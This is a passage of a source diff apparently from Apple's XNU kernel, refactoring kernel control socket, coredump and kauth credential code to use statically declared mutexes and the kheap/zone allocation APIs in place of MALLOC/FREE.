+       lck_mtx_lock(&ctl_mtx);
 
        if (kctl_make_ref(kctl) == NULL) {
-               lck_mtx_unlock(ctl_mtx);
-               FREE(kctl, M_TEMP);
+               lck_mtx_unlock(&ctl_mtx);
+               kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl));
                return ENOMEM;
        }
 
@@ -1726,8 +1692,8 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref)
                /* Verify the same name isn't already registered */
                if (ctl_find_by_name(userkctl->ctl_name) != NULL) {
                        kctl_delete_ref(kctl->kctlref);
-                       lck_mtx_unlock(ctl_mtx);
-                       FREE(kctl, M_TEMP);
+                       lck_mtx_unlock(&ctl_mtx);
+                       kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl));
                        return EEXIST;
                }
 
@@ -1771,8 +1737,8 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref)
 
                if (ctl_find_by_id_unit(userkctl->ctl_id, userkctl->ctl_unit)) {
                        kctl_delete_ref(kctl->kctlref);
-                       lck_mtx_unlock(ctl_mtx);
-                       FREE(kctl, M_TEMP);
+                       lck_mtx_unlock(&ctl_mtx);
+                       kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl));
                        return EEXIST;
                }
                kctl->id = userkctl->ctl_id;
@@ -1826,7 +1792,7 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref)
        kctlstat.kcs_reg_count++;
        kctlstat.kcs_gencnt++;
 
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        *kctlref = kctl->kctlref;
 
@@ -1839,10 +1805,10 @@ ctl_deregister(void *kctlref)
 {
        struct kctl             *kctl;
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
        if ((kctl = kctl_from_ref(kctlref)) == NULL) {
                kctlstat.kcs_bad_kctlref++;
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                if (ctl_debug != 0) {
                        printf("%s invalid kctlref %p\n",
                            __func__, kctlref);
@@ -1851,7 +1817,7 @@ ctl_deregister(void *kctlref)
        }
 
        if (!TAILQ_EMPTY(&kctl->kcb_head)) {
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                return EBUSY;
        }
 
@@ -1861,10 +1827,10 @@ ctl_deregister(void *kctlref)
        kctlstat.kcs_gencnt++;
 
        kctl_delete_ref(kctl->kctlref);
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        ctl_post_msg(KEV_CTL_DEREGISTERED, kctl->id);
-       FREE(kctl, M_TEMP);
+       kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl));
        return 0;
 }
 
@@ -1876,7 +1842,7 @@ ctl_find_by_name(const char *name)
 {
        struct kctl     *kctl;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        TAILQ_FOREACH(kctl, &ctl_head, next)
        if (strncmp(kctl->name, name, sizeof(kctl->name)) == 0) {
@@ -1892,12 +1858,12 @@ ctl_id_by_name(const char *name)
        u_int32_t       ctl_id = 0;
        struct kctl     *kctl;
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
        kctl = ctl_find_by_name(name);
        if (kctl) {
                ctl_id = kctl->id;
        }
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        return ctl_id;
 }
@@ -1908,7 +1874,7 @@ ctl_name_by_id(u_int32_t id, char *out_name, size_t maxsize)
        int             found = 0;
        struct kctl *kctl;
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
        TAILQ_FOREACH(kctl, &ctl_head, next) {
                if (kctl->id == id) {
                        break;
@@ -1922,7 +1888,7 @@ ctl_name_by_id(u_int32_t id, char *out_name, size_t maxsize)
                strlcpy(out_name, kctl->name, maxsize);
                found = 1;
        }
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        return found ? 0 : ENOENT;
 }
@@ -1936,7 +1902,7 @@ ctl_find_by_id_unit(u_int32_t id, u_int32_t unit)
 {
        struct kctl     *kctl;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        TAILQ_FOREACH(kctl, &ctl_head, next) {
                if (kctl->id == id && (kctl->flags & CTL_FLAG_REG_ID_UNIT) == 0) {
@@ -1956,7 +1922,7 @@ kcb_find(struct kctl *kctl, u_int32_t unit)
 {
        struct ctl_cb   *kcb;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        TAILQ_FOREACH(kcb, &kctl->kcb_head, next)
        if (kcb->sac.sc_unit == unit) {
@@ -1977,13 +1943,13 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags)
 
        lr_saved = __builtin_return_address(0);
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
        /*
         * First validate the kctlref
         */
        if ((kctl = kctl_from_ref(kctlref)) == NULL) {
                kctlstat.kcs_bad_kctlref++;
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                if (ctl_debug != 0) {
                        printf("%s invalid kctlref %p\n",
                            __func__, kctlref);
@@ -1993,7 +1959,7 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags)
 
        kcb = kcb_find(kctl, unit);
        if (kcb == NULL || kcb->kctl != kctl || (so = kcb->so) == NULL) {
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                return NULL;
        }
        /*
@@ -2003,7 +1969,7 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags)
        /*
         * Respect lock ordering: socket before ctl_mtx
         */
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        socket_lock(so, 1);
        /*
@@ -2013,13 +1979,13 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags)
        i = (so->next_lock_lr + SO_LCKDBG_MAX - 1) % SO_LCKDBG_MAX;
        so->lock_lr[i] = lr_saved;
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
 
        if ((kctl = kctl_from_ref(kctlref)) == NULL || kcb->kctl == NULL) {
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                socket_unlock(so, 1);
                so = NULL;
-               lck_mtx_lock(ctl_mtx);
+               lck_mtx_lock(&ctl_mtx);
        } else if (kctlflags != NULL) {
                *kctlflags = kctl->flags;
        }
@@ -2029,7 +1995,7 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags)
                wakeup((event_t)&kcb->usecount);
        }
 
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        return so;
 }
@@ -2040,7 +2006,7 @@ ctl_post_msg(u_int32_t event_code, u_int32_t id)
        struct ctl_event_data   ctl_ev_data;
        struct kev_msg                  ev_msg;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_NOTOWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_NOTOWNED);
 
        bzero(&ev_msg, sizeof(struct kev_msg));
        ev_msg.vendor_code = KEV_VENDOR_APPLE;
@@ -2072,7 +2038,7 @@ ctl_lock(struct socket *so, int refcount, void *lr)
        }
 
        if (so->so_pcb != NULL) {
-               lck_mtx_lock(((struct ctl_cb *)so->so_pcb)->mtx);
+               lck_mtx_lock(&((struct ctl_cb *)so->so_pcb)->mtx);
        } else {
                panic("ctl_lock: so=%p NO PCB! lr=%p lrh= %s\n",
                    so, lr_saved, solockhistory_nr(so));
@@ -2111,7 +2077,7 @@ ctl_unlock(struct socket *so, int refcount, void *lr)
        printf("ctl_unlock: so=%llx sopcb=%x lock=%llx ref=%u lr=%llx\n",
            (uint64_t)VM_KERNEL_ADDRPERM(so),
            (uint64_t)VM_KERNEL_ADDRPERM(so->so_pcb,
-           (uint64_t)VM_KERNEL_ADDRPERM(((struct ctl_cb *)so->so_pcb)->mtx),
+           (uint64_t)VM_KERNEL_ADDRPERM(&((struct ctl_cb *)so->so_pcb)->mtx),
            so->so_usecount, (uint64_t)VM_KERNEL_ADDRPERM(lr_saved));
 #endif /* (MORE_KCTLLOCK_DEBUG && (DEVELOPMENT || DEBUG)) */
        if (refcount) {
@@ -2129,7 +2095,7 @@ ctl_unlock(struct socket *so, int refcount, void *lr)
                    solockhistory_nr(so));
                /* NOTREACHED */
        }
-       mutex_held = ((struct ctl_cb *)so->so_pcb)->mtx;
+       mutex_held = &((struct ctl_cb *)so->so_pcb)->mtx;
 
            lck_mtx_assert(mutex_held, LCK_MTX_ASSERT_OWNED);
            so->unlock_lr[so->next_unlock_lr] = lr_saved;
@@ -2154,7 +2120,7 @@ ctl_getlock(struct socket *so, int flags)
                         panic("ctl_getlock: so=%p usecount=%x lrh= %s\n",
                             so, so->so_usecount, solockhistory_nr(so));
                }
-                return kcb->mtx;
+                return &kcb->mtx;
        } else {
                 panic("ctl_getlock: so=%p NULL NO so_pcb %s\n",
                     so, solockhistory_nr(so));
@@ -2173,12 +2139,12 @@ kctl_reg_list SYSCTL_HANDLER_ARGS
         struct kctl *kctl;
         size_t item_size = ROUNDUP64(sizeof(struct xkctl_reg));
 
-        buf = _MALLOC(item_size, M_TEMP, M_WAITOK | M_ZERO);
+        buf = kheap_alloc(KHEAP_TEMP, item_size, Z_WAITOK | Z_ZERO);
         if (buf == NULL) {
                 return ENOMEM;
        }
 
-        lck_mtx_lock(ctl_mtx);
+        lck_mtx_lock(&ctl_mtx);
 
         n = kctlstat.kcs_reg_count;
 
@@ -2262,11 +2228,9 @@ kctl_reg_list SYSCTL_HANDLER_ARGS
        }
 
 done:
-        lck_mtx_unlock(ctl_mtx);
+        lck_mtx_unlock(&ctl_mtx);
 
-        if (buf != NULL) {
-                FREE(buf, M_TEMP);
-       }
+        kheap_free(KHEAP_TEMP, buf, item_size);
 
         return error;
 }
@@ -2285,12 +2249,12 @@ kctl_pcblist SYSCTL_HANDLER_ARGS
             2 * ROUNDUP64(sizeof(struct xsockbuf_n)) +
             ROUNDUP64(sizeof(struct xsockstat_n));
 
-        buf = _MALLOC(item_size, M_TEMP, M_WAITOK | M_ZERO);
+        buf = kheap_alloc(KHEAP_TEMP, item_size, Z_WAITOK | Z_ZERO);
         if (buf == NULL) {
                 return ENOMEM;
        }
 
-        lck_mtx_lock(ctl_mtx);
+        lck_mtx_lock(&ctl_mtx);
 
         n = kctlstat.kcs_pcbcount;
 
@@ -2378,8 +2342,9 @@ kctl_pcblist SYSCTL_HANDLER_ARGS
        }
 
 done:
-        lck_mtx_unlock(ctl_mtx);
+        lck_mtx_unlock(&ctl_mtx);
 
+        kheap_free(KHEAP_TEMP, buf, item_size);
         return error;
 }
 
@@ -2389,7 +2354,7 @@ kctl_getstat SYSCTL_HANDLER_ARGS
 #pragma unused(oidp, arg1, arg2)
         int error = 0;
 
-        lck_mtx_lock(ctl_mtx);
+        lck_mtx_lock(&ctl_mtx);
 
         if (req->newptr != USER_ADDR_NULL) {
                 error = EPERM;
@@ -2403,7 +2368,7 @@ kctl_getstat SYSCTL_HANDLER_ARGS
         error = SYSCTL_OUT(req, &kctlstat,
             MIN(sizeof(struct kctlstat), req->oldlen));
 done:
-        lck_mtx_unlock(ctl_mtx);
+        lck_mtx_unlock(&ctl_mtx);
         return error;
 }
 
index a4a3ee6cfef99943e09f736a8fbea47577520755..244508acd508713679ebacc0f7237b17f7ed3ddc 100644 (file)
@@ -302,7 +302,7 @@ coredump(proc_t core_proc, uint32_t reserve_mb, int coredump_flags)
 
        (void) task_suspend_internal(task);
 
-       MALLOC(alloced_name, char *, MAXPATHLEN, M_TEMP, M_NOWAIT | M_ZERO);
+       alloced_name = zalloc_flags(ZV_NAMEI, Z_NOWAIT | Z_ZERO);
 
        /* create name according to sysctl'able format string */
        /* if name creation fails, fall back to historical behaviour... */
@@ -562,7 +562,7 @@ out2:
        audit_proc_coredump(core_proc, name, error);
 #endif
        if (alloced_name != NULL) {
-               FREE(alloced_name, M_TEMP);
+               zfree(ZV_NAMEI, alloced_name);
        }
        if (error == 0) {
                error = error1;
index c3eb07764fc8311e2f52006b8e71f88d73eb986b..a864456f6d31040721f83972acd6dd543270fdf4 100644 (file)
@@ -74,6 +74,7 @@
 #include <security/_label.h>
 #endif
 
+#include <os/hash.h>
 #include <IOKit/IOBSD.h>
 
 void mach_kauth_cred_uthread_update( void );
@@ -106,43 +107,12 @@ void mach_kauth_cred_uthread_update( void );
  *
  * Note:       Does *NOT* currently include per-thread credential changes
  */
-
 #if DEBUG_CRED
 #define DEBUG_CRED_ENTER                printf
 #define DEBUG_CRED_CHANGE               printf
-extern void kauth_cred_print(kauth_cred_t cred);
-
-#include <libkern/OSDebug.h>    /* needed for get_backtrace( ) */
-
-int is_target_cred( kauth_cred_t the_cred );
-void get_backtrace( void );
-
-static int sysctl_dump_creds( __unused struct sysctl_oid *oidp, __unused void *arg1,
-    __unused int arg2, struct sysctl_req *req );
-static int
-sysctl_dump_cred_backtraces( __unused struct sysctl_oid *oidp, __unused void *arg1,
-    __unused int arg2, struct sysctl_req *req );
-
-#define MAX_STACK_DEPTH 8
-struct cred_backtrace {
-       int                             depth;
-       void *                  stack[MAX_STACK_DEPTH];
-};
-typedef struct cred_backtrace cred_backtrace;
-
-#define MAX_CRED_BUFFER_SLOTS 200
-struct cred_debug_buffer {
-       int                             next_slot;
-       cred_backtrace  stack_buffer[MAX_CRED_BUFFER_SLOTS];
-};
-typedef struct cred_debug_buffer cred_debug_buffer;
-cred_debug_buffer * cred_debug_buf_p = NULL;
-
 #else   /* !DEBUG_CRED */
-
 #define DEBUG_CRED_ENTER(fmt, ...)      do {} while (0)
 #define DEBUG_CRED_CHANGE(fmt, ...)     do {} while (0)
-
 #endif  /* !DEBUG_CRED */
 
 #if CONFIG_EXT_RESOLVER
@@ -155,14 +125,14 @@ cred_debug_buffer * cred_debug_buf_p = NULL;
  * times out.
  */
 
-static lck_mtx_t *kauth_resolver_mtx;
-#define KAUTH_RESOLVER_LOCK()   lck_mtx_lock(kauth_resolver_mtx);
-#define KAUTH_RESOLVER_UNLOCK() lck_mtx_unlock(kauth_resolver_mtx);
+static LCK_MTX_DECLARE(kauth_resolver_mtx, &kauth_lck_grp);
+#define KAUTH_RESOLVER_LOCK()   lck_mtx_lock(&kauth_resolver_mtx);
+#define KAUTH_RESOLVER_UNLOCK() lck_mtx_unlock(&kauth_resolver_mtx);
 
 static volatile pid_t   kauth_resolver_identity;
 static int      kauth_identitysvc_has_registered;
 static int      kauth_resolver_registered;
-static uint32_t kauth_resolver_sequence;
+static uint32_t kauth_resolver_sequence = 31337;
 static int      kauth_resolver_timeout = 30;    /* default: 30 seconds */
 
 struct kauth_resolver_work {
@@ -178,9 +148,12 @@ struct kauth_resolver_work {
        int             kr_result;
 };
 
-TAILQ_HEAD(kauth_resolver_unsubmitted_head, kauth_resolver_work) kauth_resolver_unsubmitted;
-TAILQ_HEAD(kauth_resolver_submitted_head, kauth_resolver_work)  kauth_resolver_submitted;
-TAILQ_HEAD(kauth_resolver_done_head, kauth_resolver_work)       kauth_resolver_done;
+TAILQ_HEAD(kauth_resolver_unsubmitted_head, kauth_resolver_work) kauth_resolver_unsubmitted =
+    TAILQ_HEAD_INITIALIZER(kauth_resolver_unsubmitted);
+TAILQ_HEAD(kauth_resolver_submitted_head, kauth_resolver_work) kauth_resolver_submitted =
+    TAILQ_HEAD_INITIALIZER(kauth_resolver_submitted);
+TAILQ_HEAD(kauth_resolver_done_head, kauth_resolver_work) kauth_resolver_done =
+    TAILQ_HEAD_INITIALIZER(kauth_resolver_done);
 
 /* Number of resolver timeouts between logged complaints */
 #define KAUTH_COMPLAINT_INTERVAL 1000
@@ -233,10 +206,11 @@ struct kauth_identity {
        time_t  ki_ntsid_expiry;
 };
 
-static TAILQ_HEAD(kauth_identity_head, kauth_identity) kauth_identities;
-static lck_mtx_t *kauth_identity_mtx;
-#define KAUTH_IDENTITY_LOCK()   lck_mtx_lock(kauth_identity_mtx);
-#define KAUTH_IDENTITY_UNLOCK() lck_mtx_unlock(kauth_identity_mtx);
+static TAILQ_HEAD(kauth_identity_head, kauth_identity) kauth_identities =
+    TAILQ_HEAD_INITIALIZER(kauth_identities);
+static LCK_MTX_DECLARE(kauth_identity_mtx, &kauth_lck_grp);
+#define KAUTH_IDENTITY_LOCK()   lck_mtx_lock(&kauth_identity_mtx);
+#define KAUTH_IDENTITY_UNLOCK() lck_mtx_unlock(&kauth_identity_mtx);
 #define KAUTH_IDENTITY_CACHEMAX_DEFAULT 100     /* XXX default sizing? */
 static int kauth_identity_cachemax = KAUTH_IDENTITY_CACHEMAX_DEFAULT;
 static int kauth_identity_count;
@@ -265,10 +239,11 @@ struct kauth_group_membership {
 #define KAUTH_GROUP_ISMEMBER    (1<<0)
 };
 
-TAILQ_HEAD(kauth_groups_head, kauth_group_membership) kauth_groups;
-static lck_mtx_t *kauth_groups_mtx;
-#define KAUTH_GROUPS_LOCK()     lck_mtx_lock(kauth_groups_mtx);
-#define KAUTH_GROUPS_UNLOCK()   lck_mtx_unlock(kauth_groups_mtx);
+TAILQ_HEAD(kauth_groups_head, kauth_group_membership) kauth_groups =
+    TAILQ_HEAD_INITIALIZER(kauth_groups);
+static LCK_MTX_DECLARE(kauth_groups_mtx, &kauth_lck_grp);
+#define KAUTH_GROUPS_LOCK()     lck_mtx_lock(&kauth_groups_mtx);
+#define KAUTH_GROUPS_UNLOCK()   lck_mtx_unlock(&kauth_groups_mtx);
 #define KAUTH_GROUPS_CACHEMAX_DEFAULT 100       /* XXX default sizing? */
 static int kauth_groups_cachemax = KAUTH_GROUPS_CACHEMAX_DEFAULT;
 static int kauth_groups_count;
@@ -283,6 +258,7 @@ static void     kauth_groups_trimcache(int newsize);
 #define KAUTH_CRED_TABLE_SIZE 128
 
 ZONE_DECLARE(ucred_zone, "cred", sizeof(struct ucred), ZC_ZFREE_CLEARMEM);
+
 LIST_HEAD(kauth_cred_entry_head, ucred);
 static struct kauth_cred_entry_head
     kauth_cred_table_anchor[KAUTH_CRED_TABLE_SIZE];
@@ -323,7 +299,7 @@ __KERNEL_IS_WAITING_ON_EXTERNAL_CREDENTIAL_RESOLVER__(
                /* we could compute a better timeout here */
                ts.tv_sec = kauth_resolver_timeout;
                ts.tv_nsec = 0;
-               error = msleep(workp, kauth_resolver_mtx, PCATCH, "kr_submit", &ts);
+               error = msleep(workp, &kauth_resolver_mtx, PCATCH, "kr_submit", &ts);
                /* request has been completed? */
                if ((error == 0) && (workp->kr_flags & KAUTH_REQUEST_DONE)) {
                        break;
@@ -343,43 +319,6 @@ __KERNEL_IS_WAITING_ON_EXTERNAL_CREDENTIAL_RESOLVER__(
 }
 
 
-/*
- * kauth_resolver_init
- *
- * Description:        Initialize the daemon side of the credential identity resolver
- *
- * Parameters: (void)
- *
- * Returns:    (void)
- *
- * Notes:      Initialize the credential identity resolver for use; the
- *             credential identity resolver is the KPI used by the user
- *             space credential identity resolver daemon to communicate
- *             with the kernel via the identitysvc() system call..
- *
- *             This is how membership in more than 16 groups (1 effective
- *             and 15 supplementary) is supported, and also how UID's,
- *             UUID's, and so on, are translated to/from POSIX credential
- *             values.
- *
- *             The credential identity resolver operates by attempting to
- *             determine identity first from the credential, then from
- *             the kernel credential identity cache, and finally by
- *             enqueueing a request to a user space daemon.
- *
- *             This function is called from kauth_init() in the file
- *             kern_authorization.c.
- */
-void
-kauth_resolver_init(void)
-{
-       TAILQ_INIT(&kauth_resolver_unsubmitted);
-       TAILQ_INIT(&kauth_resolver_submitted);
-       TAILQ_INIT(&kauth_resolver_done);
-       kauth_resolver_sequence = 31337;
-       kauth_resolver_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/);
-}
-
 /*
  * kauth_resolver_identity_reset
  *
@@ -469,7 +408,8 @@ kauth_resolver_submit(struct kauth_identity_extlookup *lkp, uint64_t extend_data
                }
        }
 
-       MALLOC(workp, struct kauth_resolver_work *, sizeof(*workp), M_KAUTH, M_WAITOK);
+       workp = kheap_alloc(KM_KAUTH, sizeof(struct kauth_resolver_work),
+           Z_WAITOK);
        if (workp == NULL) {
                return ENOMEM;
        }
@@ -575,7 +515,7 @@ kauth_resolver_submit(struct kauth_identity_extlookup *lkp, uint64_t extend_data
         * If we dropped the last reference, free the request.
         */
        if (shouldfree) {
-               FREE(workp, M_KAUTH);
+               kheap_free(KM_KAUTH, workp, sizeof(struct kauth_resolver_work));
        }
 
        KAUTH_DEBUG("RESOLVER - returning %d", error);
@@ -795,7 +735,7 @@ kauth_resolver_getwork_continue(int result)
        if (TAILQ_FIRST(&kauth_resolver_unsubmitted) == NULL) {
                int error;
 
-               error = msleep0(&kauth_resolver_unsubmitted, kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue);
+               error = msleep0(&kauth_resolver_unsubmitted, &kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue);
                /*
                 * If this is a wakeup from another thread in the resolver
                 * deregistering it, error out the request-for-work thread
@@ -938,7 +878,7 @@ kauth_resolver_getwork(user_addr_t message)
                struct uthread *ut = get_bsdthread_info(thread);
 
                ut->uu_save.uus_kauth.message = message;
-               error = msleep0(&kauth_resolver_unsubmitted, kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue);
+               error = msleep0(&kauth_resolver_unsubmitted, &kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue);
                KAUTH_RESOLVER_UNLOCK();
                /*
                 * If this is a wakeup from another thread in the resolver
@@ -1149,30 +1089,6 @@ kauth_resolver_complete(user_addr_t message)
 #define KI_VALID_GROUPS (1<<6)
 
 #if CONFIG_EXT_RESOLVER
-/*
- * kauth_identity_init
- *
- * Description:        Initialize the kernel side of the credential identity resolver
- *
- * Parameters: (void)
- *
- * Returns:    (void)
- *
- * Notes:      Initialize the credential identity resolver for use; the
- *             credential identity resolver is the KPI used to communicate
- *             with a user space credential identity resolver daemon.
- *
- *             This function is called from kauth_init() in the file
- *             kern_authorization.c.
- */
-void
-kauth_identity_init(void)
-{
-       TAILQ_INIT(&kauth_identities);
-       kauth_identity_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/);
-}
-
-
 /*
  * kauth_identity_alloc
  *
@@ -1198,7 +1114,8 @@ kauth_identity_alloc(uid_t uid, gid_t gid, guid_t *guidp, time_t guid_expiry,
        struct kauth_identity *kip;
 
        /* get and fill in a new identity */
-       MALLOC(kip, struct kauth_identity *, sizeof(*kip), M_KAUTH, M_WAITOK | M_ZERO);
+       kip = kheap_alloc(KM_KAUTH, sizeof(struct kauth_identity),
+           Z_WAITOK | Z_ZERO);
        if (kip != NULL) {
                if (gid != KAUTH_GID_NONE) {
                        kip->ki_gid = gid;
@@ -1334,7 +1251,7 @@ kauth_identity_register_and_free(struct kauth_identity *kip)
                        vfs_removename(ip->ki_name);
                }
                /* free the expired entry */
-               FREE(ip, M_KAUTH);
+               kheap_free(KM_KAUTH, ip, sizeof(struct kauth_identity));
        }
 }
 
@@ -1544,13 +1461,13 @@ kauth_identity_trimcache(int newsize)
 {
        struct kauth_identity           *kip;
 
-       lck_mtx_assert(kauth_identity_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&kauth_identity_mtx, LCK_MTX_ASSERT_OWNED);
 
        while (kauth_identity_count > newsize) {
                kip = TAILQ_LAST(&kauth_identities, kauth_identity_head);
                TAILQ_REMOVE(&kauth_identities, kip, ki_link);
                kauth_identity_count--;
-               FREE(kip, M_KAUTH);
+               kheap_free(KM_KAUTH, kip, sizeof(struct kauth_identity));
        }
 }
 
@@ -2987,29 +2904,6 @@ found:
  * XXX the linked-list implementation here needs to be optimized.
  */
 
-/*
- * kauth_groups_init
- *
- * Description:        Initialize the groups cache
- *
- * Parameters: (void)
- *
- * Returns:    (void)
- *
- * Notes:      Initialize the groups cache for use; the group cache is used
- *             to avoid unnecessary calls out to user space.
- *
- *             This function is called from kauth_init() in the file
- *             kern_authorization.c.
- */
-void
-kauth_groups_init(void)
-{
-       TAILQ_INIT(&kauth_groups);
-       kauth_groups_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/);
-}
-
-
 /*
  * kauth_groups_expired
  *
@@ -3120,7 +3014,8 @@ kauth_groups_updatecache(struct kauth_identity_extlookup *el)
        }
 
        /* allocate a new record */
-       MALLOC(gm, struct kauth_group_membership *, sizeof(*gm), M_KAUTH, M_WAITOK);
+       gm = kheap_alloc(KM_KAUTH, sizeof(struct kauth_group_membership),
+           Z_WAITOK);
        if (gm != NULL) {
                gm->gm_uid = el->el_uid;
                gm->gm_gid = el->el_gid;
@@ -3150,9 +3045,7 @@ kauth_groups_updatecache(struct kauth_identity_extlookup *el)
        KAUTH_GROUPS_UNLOCK();
 
        /* free expired cache entry */
-       if (gm != NULL) {
-               FREE(gm, M_KAUTH);
-       }
+       kheap_free(KM_KAUTH, gm, sizeof(struct kauth_group_membership));
 }
 
 /*
@@ -3165,13 +3058,13 @@ kauth_groups_trimcache(int new_size)
 {
        struct kauth_group_membership *gm;
 
-       lck_mtx_assert(kauth_groups_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&kauth_groups_mtx, LCK_MTX_ASSERT_OWNED);
 
        while (kauth_groups_count > new_size) {
                gm = TAILQ_LAST(&kauth_groups, kauth_groups_head);
                TAILQ_REMOVE(&kauth_groups, gm, gm_link);
                kauth_groups_count--;
-               FREE(gm, M_KAUTH);
+               kheap_free(KM_KAUTH, gm, sizeof(struct kauth_group_membership));
        }
 }
 #endif  /* CONFIG_EXT_RESOLVER */
@@ -3508,7 +3401,7 @@ kauth_cred_issuser(kauth_cred_t cred)
  */
 
 /* lock protecting credential hash table */
-static lck_mtx_t kauth_cred_hash_mtx;
+static LCK_MTX_DECLARE(kauth_cred_hash_mtx, &kauth_lck_grp);
 #define KAUTH_CRED_HASH_LOCK()          lck_mtx_lock(&kauth_cred_hash_mtx);
 #define KAUTH_CRED_HASH_UNLOCK()        lck_mtx_unlock(&kauth_cred_hash_mtx);
 #define KAUTH_CRED_HASH_LOCK_ASSERT()   LCK_MTX_ASSERT(&kauth_cred_hash_mtx, LCK_MTX_ASSERT_OWNED)
@@ -3548,8 +3441,6 @@ static lck_mtx_t kauth_cred_hash_mtx;
 void
 kauth_cred_init(void)
 {
-       lck_mtx_init(&kauth_cred_hash_mtx, kauth_lck_grp, 0 /*LCK_ATTR_NULL*/);
-
        for (int i = 0; i < KAUTH_CRED_TABLE_SIZE; i++) {
                LIST_INIT(&kauth_cred_table_anchor[i]);
        }
@@ -4812,12 +4703,6 @@ kauth_cred_tryref(kauth_cred_t cred)
                kauth_cred_panic_over_retain(cred);
        }
 
-#if 0 // use this to watch a specific credential
-       if (is_target_cred( *credp ) != 0) {
-               get_backtrace();
-       }
-#endif
-
        return true;
 }
 
@@ -4841,12 +4726,6 @@ kauth_cred_ref(kauth_cred_t cred)
        if (__improbable(old_ref >= KAUTH_CRED_REF_MAX)) {
                kauth_cred_panic_over_retain(cred);
        }
-
-#if 0 // use this to watch a specific credential
-       if (is_target_cred( cred ) != 0) {
-               get_backtrace();
-       }
-#endif
 }
 
 /*
@@ -4866,12 +4745,6 @@ kauth_cred_unref_fast(kauth_cred_t cred)
 {
        u_long old_ref = os_atomic_dec_orig(&cred->cr_ref, relaxed);
 
-#if 0 // use this to watch a specific credential
-       if (is_target_cred( *credp ) != 0) {
-               get_backtrace();
-       }
-#endif
-
        if (__improbable(old_ref <= 0)) {
                kauth_cred_panic_over_released(cred);
        }
@@ -5246,7 +5119,7 @@ kauth_cred_is_equal(kauth_cred_t cred1, kauth_cred_t cred2)
 #if CONFIG_MACF
        /* Note: we know the flags are equal, so we only need to test one */
        if (pcred1->cr_flags & CRF_MAC_ENFORCE) {
-               if (!mac_cred_label_compare(cred1->cr_label, cred2->cr_label)) {
+               if (!mac_cred_label_is_equal(cred1->cr_label, cred2->cr_label)) {
                        return false;
                }
        }
@@ -5328,37 +5201,6 @@ kauth_cred_find(kauth_cred_t cred)
 }
 
 
-/*
- * kauth_cred_hash
- *
- * Description:        Generates a hash key using data that makes up a credential;
- *             based on ElfHash
- *
- * Parameters: datap                           Pointer to data to hash
- *             data_len                        Count of bytes to hash
- *             start_key                       Start key value
- *
- * Returns:    (u_long)                        Returned hash key
- */
-static inline u_long
-kauth_cred_hash(const uint8_t *datap, int data_len, u_long start_key)
-{
-       u_long  hash_key = start_key;
-       u_long  temp;
-
-       while (data_len > 0) {
-               hash_key = (hash_key << 4) + *datap++;
-               temp = hash_key & 0xF0000000;
-               if (temp) {
-                       hash_key ^= temp >> 24;
-               }
-               hash_key &= ~temp;
-               data_len--;
-       }
-       return hash_key;
-}
-
-
 /*
  * kauth_cred_get_bucket
  *
@@ -5383,356 +5225,25 @@ kauth_cred_get_bucket(kauth_cred_t cred)
 #if CONFIG_MACF
        posix_cred_t pcred = posix_cred_get(cred);
